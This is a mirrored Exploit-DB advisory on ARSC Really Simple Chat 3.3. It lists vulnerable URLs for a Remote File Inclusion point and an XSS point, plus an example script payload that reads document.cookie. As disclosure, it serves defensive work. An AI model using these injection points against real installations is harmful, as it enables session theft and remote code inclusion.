- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14050
- Проверка EDB
-
- Пройдено
- Автор
- ZER0 THUNDER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-06-25
Код:
=> ARSC Really Simple Chat V3.3 Remote File Inclsion & Cross Site Scripting Vulnerability
=> Author : Zer0 Thunder
=> Home : http://colombohackers.com
=> Download : http://sourceforge.net/projects/arsc/
=> Date : 06/25/2010
Remote File Inclusion
---
http://localhost/arsc3.3-pre2/base/dereferer.php?arsc_link=[RFI]
XSS Call
--------
http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=[XSS]
Example :
http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
- Источник
- www.exploit-db.com